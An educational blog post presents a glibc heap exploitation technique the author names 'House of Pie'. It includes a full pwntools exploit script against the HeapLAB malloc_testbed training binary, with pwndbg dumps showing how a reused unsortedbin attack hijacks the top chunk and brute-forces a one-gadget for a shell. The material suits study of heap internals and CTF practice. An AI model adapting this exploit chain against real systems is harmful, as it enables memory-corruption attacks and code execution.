Linux Heap Exploitation - House of Pie

2021-11-27

Interesting glibc malloc behaviour that can aid in exploit writing.

Environment Setup

OS: Ubuntu 20.04 VM
Tools: pwndbg, pwntools, python3
Target: malloc-testbed(https://github.com/limitedeternity/HeapLAB/tree/main/malloc_testbed)

Introduction

Some of the more seasoned heap exploit writers might be wondering “hey what’s this house of pie nonsense I’ve never heard of before”.
Well, it’s just a name I made up to describe an interesting behaviour of the glibc malloc implementation that I discovered during my research of the linux heap.
As much as I would like to take credit for the entire idea, the basis of it is largely similar to the known House of Roman exploitation technique.
House of Pie, similar to House of Roman, is a leakless heap exploitation technique that hinges on partially bruteforcing libc addresses to defeat ASLR with a 1/4096 probability, and works without any leaks from the program, even if it closes stdout so File Stream Oriented Programming shenanigans do not work.
The biggest difference from House of Roman is that House of Pie provides control over the top chunk pointer, so one could argue that it provides more flexibility in exploitation(such as pivoting the top chunk to overwrite bss data or GOT entries, provided that the relevant protection mechanisms are not enabled).
The current idea works on glibc versions below 2.26(introduction of tcache), and thus we are safe from top chunk size sanity checks introduced in version 2.29.
Despite it far from being a cutting edge technique, I believe that the House of Pie has its value of introducing a novel way of “re-using” unsortedbin attacks, and knowledge of this behaviour may aid ctf players or exploit writers facing weird constraints.
Just to recap, unsortedbin attacks work by abusing the partial unlink feature of the circular doubly linked unsorted bins to write an address inside the main arena(therefore a libc address) anywhere in memory.
First it gets to the last chunk in the unsorted bin by following the backward pointer(bk) of the unsortedbin head, residing in the main arena.
It then follows the bk of the last chunk to locate the second last chunk, and writes the address of the unsortedbin head to the second last chunk’s forward pointer(fd).
Finally, it writes the bk of the last chunk to the unsortedbin head’s bk.
Now the last chunk is unlinked from the unsorted bin, and we as exploit writers get a primitive of arbitrarily writing a libc address to any address of our choosing(must be writeable of course).
However, the careful reader will realise that the next time we trigger an unsortedbin unlink, it will follow the bk of the unsortedbin head that we have corrupted, and eventually segfault due to an inability to satisfy the unsortedbin links integrity checks.
This makes the unsortedbin attack a primitive that can only be used once, before having to completely abandon the unsorted bin.
In the House of Pie, we prudently target our first attack, such that the unsorted bin repairs itself after achieving our intended write.
This allows us to re-use it for another arbitrary libc address write, which is immensely helpful in a leakless exploitation scenario.

Let’s see it in action against a test binary with a use after free vulnerability.

Implementation

wrapper script

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF("malloc_testbed")
libc = elf.libc

gs = '''
'''

def start():
    if args.GDB:
        context(terminal=['tmux', 'new-window'])
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# Index of allocated chunks.
index = 0

# Select the "malloc" option; send size.
# Return chunk index.
def malloc(size):
    global index
    io.send("1")
    io.sendafter("size: ", f"{size}")
    io.recvuntil("> ")
    index += 1
    return index - 1

# Select the "calloc" option; send size.
# Return chunk index.
def calloc(size):
    global index
    io.send("2")
    io.sendafter("size: ", f"{size}")
    io.recvuntil("> ")
    index += 1
    return index - 1

# Select the "free" option; send index.
def free(index):
    io.send("3")
    io.sendafter("index: ", f"{index}")
    io.recvuntil("> ")

# Select the "free address" option; send address.
def free_address(address):
    io.send("4")
    io.sendafter("address: ", f"{address}")
    io.recvuntil("> ")

# Select the "edit" option; send index & data.
def edit(index, data):
    io.send("5")
    io.sendafter("index: ", f"{index}")
    io.sendafter("data: ", data)
    io.recvuntil("> ")

# Select the "read" option; send index.
# Return data from read operation.
def read(index):
    io.send("6")
    io.sendafter("index: ", f"{index}")
    r = io.recvuntil("\n1) malloc", drop=True)
    io.recvuntil("> ")
    return r

io = start()

# This binary leaks the address of puts(), use it to resolve the libc load address.
io.recvuntil("puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts

# This binary leaks the heap start address.
io.recvuntil("heap @ ")
heap = int(io.recvline(), 16)

# This binary leaks the address of its m_array.
io.recvuntil("m_array @ ")
m_array = int(io.recvline(), 16)
io.recvuntil("> ")
io.timeout = 0.1

# =============================================================================
log.info(f"libc is at 0x{libc.address:02x}")
log.info(f"heap is at 0x{heap:02x}")
log.info(f"m_array is at 0x{m_array:02x}")

This binary actually leaks heap and libc addresses, but we can just pretend it doesn’t and not use those.

setup

unsorted1 = malloc(0x88) # get libc address for fastbin FD
fast1 = malloc(0x48)
fast2 = malloc(0x48) # fast chunks for poisoning fastbin
unsorted2 = malloc(0x88)
fake_size = malloc(0x78) # fast chunk to get fake size field in main arena

We allocate a few chunks that will be crucial for later use. I’ve labelled them according to their usage.

forge fake size field in main arena

# get fake size field
free(fake_size)
edit(fake_size, p64(0x51))
fake_size = malloc(0x78) # 0x51 is now a value in main arena, but we cannot use 0x80 size fastbins anymore

This sets the 0x80 fastbin head residing in the main arena to an address of 0x51, which is invalid but we can use as a size field.
Demonstration of this is in my “CTF.SG pwn challenge” post.

get unsorted chunk by freeing and remaindering unsorted chunk

# free and remainder the unsorted chunk to get pointer into main arena
free(unsorted1)
unsorted_1_1 = malloc(0x38)
unsorted_1_2 = malloc(0x48) # clear remainder

state of the heap after this step:

pwndbg> vis

0x603000        0x0000000000000000      0x0000000000000041      ........A.......
0x603010        0x00007ffff7dd4bd8      0x00007ffff7dd4bd8      .K.......K......
0x603020        0x0000000000000000      0x0000000000000000      ................
0x603030        0x0000000000000000      0x0000000000000000      ................
0x603040        0x0000000000000000      0x0000000000000051      ........Q.......
0x603050        0x00007ffff7dd4b58      0x00007ffff7dd4b58      XK......XK......
0x603060        0x0000000000000000      0x0000000000000000      ................
0x603070        0x0000000000000000      0x0000000000000000      ................
0x603080        0x0000000000000000      0x0000000000000000      ................
0x603090        0x0000000000000050      0x0000000000000051      P.......Q.......
0x6030a0        0x0000000000000000      0x0000000000000000      ................
0x6030b0        0x0000000000000000      0x0000000000000000      ................
0x6030c0        0x0000000000000000      0x0000000000000000      ................
0x6030d0        0x0000000000000000      0x0000000000000000      ................
0x6030e0        0x0000000000000000      0x0000000000000051      ........Q.......
0x6030f0        0x0000000000000000      0x0000000000000000      ................
0x603100        0x0000000000000000      0x0000000000000000      ................
0x603110        0x0000000000000000      0x0000000000000000      ................
0x603120        0x0000000000000000      0x0000000000000000      ................
0x603130        0x0000000000000000      0x0000000000000091      ................
0x603140        0x0000000000000000      0x0000000000000000      ................
0x603150        0x0000000000000000      0x0000000000000000      ................
0x603160        0x0000000000000000      0x0000000000000000      ................
0x603170        0x0000000000000000      0x0000000000000000      ................
0x603180        0x0000000000000000      0x0000000000000000      ................
0x603190        0x0000000000000000      0x0000000000000000      ................
0x6031a0        0x0000000000000000      0x0000000000000000      ................
0x6031b0        0x0000000000000000      0x0000000000000000      ................
0x6031c0        0x0000000000000000      0x0000000000000081      ................
0x6031d0        0x0000000000000051      0x0000000000000000      Q...............
0x6031e0        0x0000000000000000      0x0000000000000000      ................
0x6031f0        0x0000000000000000      0x0000000000000000      ................
0x603200        0x0000000000000000      0x0000000000000000      ................
0x603210        0x0000000000000000      0x0000000000000000      ................
0x603220        0x0000000000000000      0x0000000000000000      ................
0x603230        0x0000000000000000      0x0000000000000000      ................
0x603240        0x0000000000000000      0x0000000000020dc1      ................         <-- Top chunk

unsorted_1_2 currently holds an address of the unsortedbin head.
unsorted_1_1 holds the address of the 0x90 smallbin head, because our unsorted chunk was linked into the 0x90 smallbin during remaindering.

partial overwrite

# fastbin posoning to get fast chunk in main arena
free(fast1)
free(fast2)
edit(fast2, p8(0x40)) # partial overwrite

# partial overwrite unsortedbin fd to get a 0x50 size fast chunk in main arena
edit(unsorted_1_2, p8(0x30))
fast2 = malloc(0x48)
overlap_unsorted_1_2 = malloc(0x48)
main_arena_chunk = malloc(0x48)

In this step we poison the 0x50 fastbin with unsorted_1_2, then partial overwrite its fd to point to the 0x50 size field we crafted earlier inside of main arena.
The same can be achieved by crafting overlapping chunks, but we would have to set that up before remaindering so the unsortedbin pointers don’t get wiped out by fastbin fd.
Finally, we get a fake chunk inside of main arena, and can write enough data to reach the top chunk pointer.

However, we don’t really know any address to pivot the top chunk to, so here comes the first unsortedbin attack.

setup

1 2	# use fast chunk to write sane size field inside of main arena edit(main_arena_chunk, p64(0) + p64(0) + p64(0x88)) # be a smaller field so our request gets sorted instead of remaindered

This version of glibc has unsortedbin size sanity checks, so we use the main arena chunk to write a sane size field for our fake unsortedbin chunk.

main arena after write:

pwndbg> dq &main_arena 50
00007ffff7dd4b00     0000000000000000 0000000000000000
00007ffff7dd4b10     0000000000000000 0000000000000000
00007ffff7dd4b20     0000000000000000 0000000000000000
00007ffff7dd4b30     0000000000000000 0000000000000051
00007ffff7dd4b40     0000000000000000 0000000000000000
00007ffff7dd4b50     0000000000000088 0000000000603240
00007ffff7dd4b60     0000000000603040 00007ffff7dd4b58
00007ffff7dd4b70     00007ffff7dd4b58 00007ffff7dd4b68
00007ffff7dd4b80     00007ffff7dd4b68 00007ffff7dd4b78
00007ffff7dd4b90     00007ffff7dd4b78 00007ffff7dd4b88
00007ffff7dd4ba0     00007ffff7dd4b88 00007ffff7dd4b98
00007ffff7dd4bb0     00007ffff7dd4b98 00007ffff7dd4ba8
00007ffff7dd4bc0     00007ffff7dd4ba8 00007ffff7dd4bb8
00007ffff7dd4bd0     00007ffff7dd4bb8 00007ffff7dd4bc8
00007ffff7dd4be0     00007ffff7dd4bc8 00007ffff7dd4bd8
00007ffff7dd4bf0     00007ffff7dd4bd8 00007ffff7dd4be8
00007ffff7dd4c00     00007ffff7dd4be8 00007ffff7dd4bf8
00007ffff7dd4c10     00007ffff7dd4bf8 00007ffff7dd4c08
00007ffff7dd4c20     00007ffff7dd4c08 00007ffff7dd4c18
00007ffff7dd4c30     00007ffff7dd4c18 00007ffff7dd4c28
00007ffff7dd4c40     00007ffff7dd4c28 00007ffff7dd4c38
00007ffff7dd4c50     00007ffff7dd4c38 00007ffff7dd4c48
00007ffff7dd4c60     00007ffff7dd4c48 00007ffff7dd4c58
00007ffff7dd4c70     00007ffff7dd4c58 00007ffff7dd4c68
00007ffff7dd4c80     00007ffff7dd4c68 00007ffff7dd4c78

Our crafted size field is at 4b50, top chunk pointer at 4b58, and last remainder pointer at 4b60.

Now comes the essence of House of Pie.
Since the last remainder holds an address to our unsorted_1_2, and unsorted_1_2 has a bk pointing to the unsortedbin head, our first unsortedbin attack that target the chunk at address 0x7ffff7dd4b48 will work as follows:

Write address of unsortedbin head to fd of chunk at 0x7ffff7dd4b48, which is the top chunk pointer!
Write 0x7ffff7dd4b48 to unsortedbin head’s bk

Now, assuming we triggered an unsortedbin sort by requesting a chunk size that is not satisfied by the last chunk, the unlinking process will continue until a suitable chunk is found or the unsortedbin is empty.(I refrain from using “exhausted” since that’s also a process in glibc malloc)

In the next round, the chunk to be unlinked is located using the unsortedbin head’s bk, which is 0x7ffff7dd4b48.
0x7ffff7dd4b48’s bk points to the “last remainder” chunk.

so for the next round:

Write address of unsortedbin head to fd of “last remainder” chunk.
Write last remainder chunk’s address to unsortedbin head’s bk

Now the chunk to be unlinked is the last remainder chunk.
last remainder chunk’s bk naturally contains the address of the unsortedbin head from the first remaindering

AND the final round:

Write address of unsortedbin head to fd of unsortedbin head.
Write unsortedbin head’s address to unsortedbin head’s bk

Boom, the unsortedbin fixes itself, and we get to overwrite the top chunk pointer with a libc address.

code

# unsortedbin attack to write libc address over top chunk address
free(unsorted2)
edit(unsorted2, p64(0) + p8(0x48))

# request a size not in unsortedbin to trigger unsortedbin sort, writing libc address over top chunk and fixing itself
new_chunk = malloc(0x98)

effect:

pwndbg> dq &main_arena 30
00007ffff7dd4b00     0000000000000000 0000000000000000
00007ffff7dd4b10     0000000000000000 0000000000000000
00007ffff7dd4b20     0000000000000000 0000000000000000
00007ffff7dd4b30     0000000000000000 0000000000000051
00007ffff7dd4b40     0000000000000000 0000000000000000
00007ffff7dd4b50     0000000000000088 00007ffff7dd4c68
00007ffff7dd4b60     00007ffff7dd4bc8 00007ffff7dd4b58
00007ffff7dd4b70     00007ffff7dd4b58 00007ffff7dd4b68
00007ffff7dd4b80     00007ffff7dd4b68 00007ffff7dd4b78
00007ffff7dd4b90     00007ffff7dd4b78 00007ffff7dd4b88
00007ffff7dd4ba0     00007ffff7dd4b88 0000000000603040
00007ffff7dd4bb0     0000000000603040 00007ffff7dd4ba8
00007ffff7dd4bc0     00007ffff7dd4ba8 00007ffff7dd4bb8
00007ffff7dd4bd0     00000000000000a1 00007ffff7dd4b48
00007ffff7dd4be0     00007ffff7dd4b48 0000000000603130
pwndbg> top_chunk 
Top chunk
Addr: 0x7ffff7dd4c68
Size: 0x7ffff7dd4b19

But why is the top chunk not pointing to the unsortedbin head? That’s because our previous allocation, after “emptying” the unsorted bin, came from the top chunk which we already pivoted to inside of main arena.

Up to this point, we gained control of the top chunk without any leaks and without any bruteforcing, purely playing by the rules of malloc. AND we still have an opportunity of an unsortedbin attack! :)

The remaining steps are pretty simple:

# partial bruteforce libc address of top chunk to point to malloc hook - 0x18, 1/16 probability
edit(main_arena_chunk, p64(0)*3 + p8(0xe0) + p8(0x4a))

# allocate two chunks and free one to get libc pointers, then partial overwrite to one gadget
overwrite = malloc(0x98)
malloc(0x98) # prevent next size check into main arena and failing
free(overwrite)

# partial bruteforce to one gadget, 1/4096 probability
edit(overwrite, p8(0xb2) + p8(0xcf) + p8(0xa7))

# call malloc. our size field is, luckily, the argv pointer so pass in 0
malloc(0)
# =============================================================================

io.interactive()

We partially bruteforce the top chunk to point to slightly before malloc hook, get libc pointers and bruteforce to one gadget.

If the unsortedbin hadn’t been fixed, we won’t be able to allocate the 0x98 chunks to leak libc pointers, because malloc will attempt to search the unsorted bin and segfault somewhere.

With a 1/4096 probability, we can get a shell.

Conclusion

When I first found out about this behaviour I genuinely got a shock xD, like woah malloc is made to be hacked!

The whole post was about the Pros, so I’ll go over some Cons here.

one gadget constraints still have to be satisfied, we cannot target free hook because the top chunk size cannot be 0
bruteforcing is quite ugly tbh
who still uses glibc 2.25?? more modern versions have top chunk checks, safe linking and even removed the hooks
probably must have a UAF to work… which is a very very powerful primitive already

At the very least, treat it as a variant of the House of Roman that might satisfy one gadget constraints that House of Roman doesn’t.

Thanks for reading, take care and goodbye~